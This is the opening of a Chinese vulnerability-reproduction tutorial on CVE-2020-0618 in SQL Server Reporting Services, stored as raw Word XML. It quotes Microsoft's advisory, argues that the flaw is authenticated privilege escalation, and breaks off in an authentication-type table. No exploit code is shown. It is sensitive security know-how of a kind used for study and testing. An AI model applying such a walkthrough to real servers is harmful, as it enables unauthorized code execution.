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417" w:rsidRDefault="009B14DC" w:rsidP="009B14DC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft </w:t>
      </w:r>
      <w:r w:rsidRPr="009B14DC">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>SQL S</w:t>
      </w:r>
      <w:r w:rsidRPr="009B14DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>erver</w:t>
      </w:r>
      <w:r w:rsidRPr="009B14DC">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> R</w:t>
      </w:r>
      <w:r w:rsidRPr="009B14DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>eport</w:t>
      </w:r>
      <w:r w:rsidRPr="009B14DC">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>ing Services</w:t>
      </w:r>
      <w:r w:rsidRPr="009B14DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>权限提升漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
      <w:r w:rsidRPr="009B14DC">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00CD2EE8">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>CVE-2020-061</w:t>
      </w:r>
      <w:r w:rsidRPr="009B14DC">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="009B14DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00437BF1" w:rsidRDefault="00437BF1" w:rsidP="009B14DC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00437BF1" w:rsidRDefault="00437BF1" w:rsidP="00437BF1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidR="009252BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本文</w:t>
      </w:r>
      <w:r w:rsidR="007D7CF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D0B34" w:rsidRPr="002D0B34" w:rsidRDefault="002D0B34" w:rsidP="002D0B34">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相比网上其他关于此漏洞的复现分析，本文有如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个看点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A86506" w:rsidRDefault="00CA6CF1" w:rsidP="00437BF1">
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00437BF1">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这并不是一个</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:t>QL S</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>erver</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的远程代码执行漏洞（详情见下文），我更愿意称为</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:t>QL S</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>erver</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Re</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:t>porting S</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ervices</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限提升漏洞</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C70A1" w:rsidRDefault="00CA6CF1" w:rsidP="00437BF1">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="002C70A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本着让像我一样的菜鸟能够“只要照做，就能复现”，故写下此篇“啰嗦”的文章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00437BF1" w:rsidRPr="00437BF1" w:rsidRDefault="00437BF1" w:rsidP="00437BF1"/>
    <w:p w:rsidR="009B14DC" w:rsidRDefault="00AB2E6B" w:rsidP="00CD2EE8">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>0x01</w:t>
      </w:r>
      <w:r w:rsidR="009252BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B14DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00443CAE" w:rsidRDefault="00443CAE" w:rsidP="00443CAE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>朋友圈中看到有人发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">icrosoft </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>QL S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>erver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的远程代码执行漏洞复现（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>VE-2020-0618</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），一看这么大个漏洞，赶紧兴致勃勃的复现，结果复现时发现是验证后的远程代码执行漏洞，略微失望，经过查阅官方资料，更加失望了，首先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Re</w:t>
      </w:r>
      <w:r>
        <w:t>porting S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ervices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不是默认安装的，其次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Re</w:t>
      </w:r>
      <w:r>
        <w:t>porting S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ervices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份验证，因此这个验证后的远程代码执行漏洞，我更愿意称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>QL S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>erver</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Re</w:t>
      </w:r>
      <w:r>
        <w:t>porting S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ervices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限提升漏洞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外查阅了网上公开的文章【详细参见附录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>】，发现照做之后并不能成功复现，其中有很多细节没提到，本着让像我一样的菜鸟能够“只要照做，就能复现”，故写下此篇“啰嗦”的文章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00443CAE" w:rsidRPr="00443CAE" w:rsidRDefault="00443CAE" w:rsidP="00443CAE"/>
    <w:p w:rsidR="00E37237" w:rsidRDefault="00E37237" w:rsidP="00E37237">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>微软官方的描述</w:t>
      </w:r>
      <w:r w:rsidR="00A37C2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00A37C2C">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A37C2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E37237" w:rsidRPr="00E37237" w:rsidRDefault="00E37237" w:rsidP="00E37237">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E37237">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2A2A2A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests. An attacker who successfully exploited this vulnerability could execute code in the context of the Report Server service account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37C2C" w:rsidRPr="00E37237" w:rsidRDefault="00E37237" w:rsidP="00E37237">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2A2A2A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37237">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2A2A2A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>To exploit the vulnerability, an authenticated attacker would need to submit a specially crafted page request to an affected Reporting Services instance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC"/>
    <w:p w:rsidR="00A37C2C" w:rsidRDefault="00E37237" w:rsidP="009B14DC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单说就是</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B14DC" w:rsidRDefault="00E37237" w:rsidP="009B14DC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过身份验证后的用户能够以报表服务器的服务账户</w:t>
      </w:r>
      <w:r w:rsidR="00A37C2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00A37C2C" w:rsidRPr="00A37C2C">
        <w:t>nt service\reportserver</w:t>
      </w:r>
      <w:r w:rsidR="005101FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00A37C2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限远程执</w:t>
      </w:r>
      <w:r w:rsidR="00A37C2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>行代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC"/>
    <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后查阅官方对报表服务器身份验证相关的描述（</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/zh-cn/sql/reporting-services/security/authentication-with-the-report-server?view=sql-server-ver15</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35FC7" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>请求对报表服务器内容或操作进行访问的所有用户或应用程序</w:t>
      </w:r>
      <w:r w:rsidR="002D0ABB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>都必须首先使用对报表服务器配置的身份验证类型进行身份验证，然后才允许访问。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下表介绍了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> Reporting Services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="171717"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>支持的身份验证类型。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2229"/>
        <w:gridCol w:w="2049"/>
        <w:gridCol w:w="2009"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A37C2C" w:rsidTr="00A37C2C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2229" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">AuthenticationType </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>身份验证层值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>默认情况下是否使用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37C2C" w:rsidTr="00A37C2C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2229" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>RSWindowsNegotiate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Negotiate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37C2C" w:rsidTr="00A37C2C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2229" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>RSWindowsNTLM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>NTLM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRPr="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="00A37C2C">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37C2C" w:rsidTr="00A37C2C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2229" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>RSWindowsKerberos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Kerberos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37C2C" w:rsidTr="00A37C2C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2229" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>RSWindowsBasic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
